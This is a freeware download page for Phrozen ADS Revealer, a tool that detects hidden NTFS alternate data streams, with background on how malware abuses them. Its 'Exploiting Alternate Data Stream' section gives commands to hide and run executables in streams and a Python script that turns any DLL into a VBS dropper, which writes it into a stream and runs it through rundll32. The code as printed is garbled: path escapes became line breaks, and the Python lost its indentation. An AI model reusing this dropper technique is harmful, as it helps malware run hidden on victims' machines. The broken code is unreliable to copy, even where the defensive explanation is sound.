Processed through Paypal
No account required.


Donate Bitcoin to this wallet:
1KkUMXvQ2ko3xcJkzitB7WYgoW6m79WFfm
Donate Ethereum to this wallet:
0x40E56922F43637224935CDC35e2c96E0392A8505
Donate Litecoin to this wallet:
LLYAFEyqjH69gkyCEpRjXNyedRCWrVChfL

  Our merchandise, sold here, helps keep the site alive.  


Facebook Follow @GeekOnTheLoose




 Home » OlderGeeks.com Freeware Downloads » Anti-Virus, Anti-Malware, Security Utilities » Advanced Malware Tools » Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642   
File - Download Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642
Description

FYI, always scroll to the bottom of the page to download files on OlderGeeks.com.
We don't believe in fake/misleading download buttons and tricks. The link is always in the same place.



Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642

Phrozen ADS (Alternate Data Stream) Revealer is a Microsoft Windows program, especially designed to reveal possible malicious ADS files in your file system. Since the Alternate Data Stream functionality is only available for NTFS (New Technology File System), the program is able to scan and detect this kind of files only for this type of file system (Physical Hard Drive/Virtual Hard Drive/Physical Removable Device/Virtual Removable Device).

If some ADS Files are detected during the scan you then can decide wether or not you want to keep them or to back them up. You can also have a content preview to detect in one glance if it looks legitemate or not. Phrozen ADS Revealer is the perfect tool to sanitize your NTFS file systems against bloated content or hidden malwares. Another great tool to put in your collection and 100% free.

What are Alternate Data Stream

Alternate data streams allow more than one data stream to be associated with a filename, using the format "filename:streamname" (e.g., "text.txt:extrastream"). NTFS Streams were introduced in Windows NT 3.1, to enable Services for Macintosh (SFM) to store resource forks. Although current versions of Windows Server no longer include SFM, third-party Apple Filing Protocol (AFP) products (such as GroupLogic's ExtremeZ-IP) still use this feature of the file system. Very small ADS (called Zone.Identifier) are added by Internet Explorer and recently by other browsers to mark files downloaded from external sites as possibly unsafe to run; the local shell would then require user confirmation before opening them.[21] When the user indicates that they no longer want this confirmation dialog, this ADS is deleted. Alternate streams are not listed in Windows Explorer, and their size is not included in the file's size. They are ignored when the file is copied or moved to another file system without ADS support, attached to an e-mail, or uploaded to a website. Thus, using alternate streams for critical data may cause problems. Microsoft provides a tool called Streams to view streams on a selected volume. Starting with Windows PowerShell 3.0, it is possible to manage ADS natively with seven cmdlets: Add-Content, Clear-Content, Get-Content, Get-Item, Out-String, Remove-Item, Set-Content. Malware has used alternate data streams to hide code. As a result, malware scanners and other special tools now check for alternate data streams.

The two potential dangers of Alternate Data Stream

Malware Vector: Using several techniques some types of malware could hide itself inside the ADS of legitimate files. You would never know about it and not all reputable antivirus programs are able to detect these on your file system. Also ADS can be used to store important information by malware and mask its activities (Storing malicious plugins files/Keylogger Logs/Webcam or Desktop capture, etc.). The infamous PoisonIvy RAT and DarkComet RAT used this technique to hide their plugins on the infected computer.
Overload Hard Drives memory: Alternate Data Stream files are not visible via Files Explorer, but physically exists in your Hard Drive. Some types of virus can fill the disk with so much junk that it can make the system almost unusable/unwritable. Using our Software you can easily now get rid of that sort of problems!

Playing with Alternate Data Stream
You can easily create Alternate Data Stream files using the Microsoft Windows Terminal program.
Create an ADS File with some text content

echo Hello World > c:\my_target.txt:myads.txt
Copy a file to ADS

type c:\file2copy.jpg > c:\my_target.txt:myads.jpg

Exploiting Alternate Data Stream
Description

If we read OWASP definition of Alternate Data Stream with an eye to security, we can see that they introduce the possibility to directly run application file from Alternate Data Stream using the following commands:

type C:\windows\system32
otepad.exe > c:\windows\system32\calc.exe:notepad.exe

start c:\windows\system32\calc.exe:notepad.exe

Unfortunately for Hackers but fortunately for your safety since the introduction of Windows 7 you cannot use this technique anymore to run application file directly from Alternate Data Stream.

However after few simple tests we found an easy but efficient way to get rid of this restriction by using the well known Rundll32.exe application from Microsoft used to run DLL code directly from command line.
Indeed Rundll32.exe doesn't apply this restriction to Alternate Data Stream so an Hacker could compile his Malware as a DLL file and directly run it hiddenly from ADS hosted by the signed and trusted process RunDll32.exe application.

Also to demonstrate this trick, we code a little snippet in Python which will encode a DLL file in a Visual Basic array of decimal value (Containing the binary code of the DLL) and generate the Visual Basic Script loader file used to extract this array to destination ADS location the malicious decoded DLL then use the Rundll32 process to execute our chosen exported function and voila.

The demonstration in Video



The DLL example code (Delphi)

-------------------------------------------------------------------------------------

library malicious;

uses Windows, Sysutils;

procedure onemethod(); stdcall;
var str : String;
begin
AllocConsole();
Writeln('Attached to path:' + GetModuleName(0));
Writeln('Attached to PID:' + IntToStr(GetCurrentProcessId));

Writeln(#13#10 + 'Press ENTER to leave!');
readln(str);
end;

exports onemethod;

begin

end.

---------------------------------------------------------------------------------

The VBS generator code (Python)

--------------------------------------------------------------------------------------

# PHROZEN SOFTWARE
# CODE EXAMPLE BY Jean-Pierre LESUEUR
# jplesueur [@] phrozensoft.com
# DESC: Generate a VBS (Visual Basic Script) file containing the possible
# malicious DLL file encoded in decimal to be written in a target file ADS
# Alternate Data Stream then run it using RunDLL32.exe.

import sys
import os.path

if len(sys.argv) != 6:
print("Missing arguments!
")
print("Usage:
")
print(r"1) The DLL file to be run from ADS (Needs to Exists)")
print(r"2) The destination VBS file (Will be created)")
print(r"3) The target file that will host the DLL file in ADS (Needs to Exists")
print(r"4) The desired ADS name of the DLL file (Choose whatever you wan't")
print(r"5) The DLL function to be call from the target DLL written to ADS")
exit()

FDLLSrc = str(sys.argv[1]) # THE DLL FILE TO BE RUN FROM ADS {NEEDS TO EXISTS}
FFileDest = str(sys.argv[2]) # THE DESTINATION VBS FILE {WILL BE CREATED}

FHostFile = str(sys.argv[3]) # THE TARGET FILE THAT WILL HOST THE DLL FILE {NEEDS TO EXISTS}
FPayloadDestName = str(sys.argv[4]) # THE ADS NAME OF THE DLL FILE {WHATEVER YOU WANT}
FDLLExportedFuncName = str(sys.argv[5]) # THE DLL FUNCTION TO BE EXECUTED FROM ADS {MUST BE PRESENT IN DLL EXPORT}

if not os.path.exists(FDLLSrc):
print("The input DLL file must exists!")
exit()

if not os.path.exists(FHostFile):
print("The host file to run input DLL from ADS must exists!")
exit()

payload = "payload=array(";
with open(FDLLSrc, 'rb') as FDLL:
while True:
s = FDLL.read(1)
if len(s) == 0: break
b = ord(s)
payload += str(b) + ","
payload = payload[:-1]
payload += ")"
FDLL.close

# WRITE THE VBS FILE
with open(FFileDest, 'w') as FDest:
FDest.write(payload + "
")

FDest.write("Set FSO = Wscript.CreateObject(\"Scripting.FileSystemObject\")
")
FDest.write("Set CTF = FSO.CreateTextFile(\"" + FHostFile + ":" + FPayloadDestName + "\")
")
FDest.write("for i = 0 to UBound(payload)
")
FDest.write("buff = buff&chr(payload(i))
")
FDest.write("next
")
FDest.write("CTF.Write buff
")
FDest.write("Dim objShell
")
FDest.write("Set objShell = WScript.CreateObject(\"WScript.Shell\")
")
FDest.write("objShell.Run(\"rundll32 \"\"" + FHostFile + ":" + FPayloadDestName + "\"\" " + FDLLExportedFuncName + "\")")


#EOF

----------------------------------------------------------------------


Sha1 : 59398e36a1ef09ae8b78fa8f2dee255eb04d78ce
Sha256 : d4db18ee6da2616aaadbba679d79701efde1f9056a98a088524baae56e0f60e1























Click here to visit the author's website.
Continue below to download this file.


Downloads Views Developer Last Update Version Size Type Rank
2,539 6,324 PHROZEN SAS <img src="https://www.oldergeeks.com/downloads/gallery/thumbs/adsrevealer1_th.png"border="0"> Nov 15, 2019 - 12:00 1.0.5642 2.42MB ZIP 5/5, out of 28 Votes.
File Tags
Phrozen  ADS  (Alternate  Data  Stream)  Revealer  v1.0.5642  
      
Whoa! Slow down there, Speedy.
Read this and then continue to the download.

Like seeing no ads? No misleading/fake download buttons?
We like it too! This site has been kept alive for 10 years
because of people just like you who download and donate.
No one is stopping you from downloading without donating
but the site runs on the "Honor System". If your momma
raised you to be honorable, make a donation and download
'til ya turn blue. Make your momma proud!

Thank you! -Randy & Deanna (The Older Geeks)

Monthly operating costs = $560
Donations for May = $546
Donations over our monthly goal
are set aside for future upgrades.

Processed securely through Paypal.
When you donate, it will say "Home Computer Repair LLC".
This is our computer store account.
Or...

Or...
Donate Bitcoin: 1KkUMXvQ2ko3xcJkzitB7WYgoW6m79WFfm
Donate Ethereum: 0x40E56922F43637224935CDC35e2c96E0392A8505
Donate Litecoin:LLYAFEyqjH69gkyCEpRjXNyedRCWrVChfL
Or...
Just send a check to our computer store payable to Home Computer Repair LLC.
Our address: Home Computer Repair LLC, 208 E. Water St. Mount Vernon, MO 65712

Recent Super Donors ($50+)
Thanks, Michael
Thanks, Computers Reborn
Thanks, Duncan

Recent Donors
Thanks, Leslie
Thanks, David
Thanks, Peter
Thanks, Robert
Thanks, Preston
Thanks, William
Thanks, Anthony
Thanks, Andrew
Thanks, Robert
Thanks, Jim

   →→ Download Now ←← - Click to Rate File -
Like this download? Share it on Twitter →


Copyright (c) 2020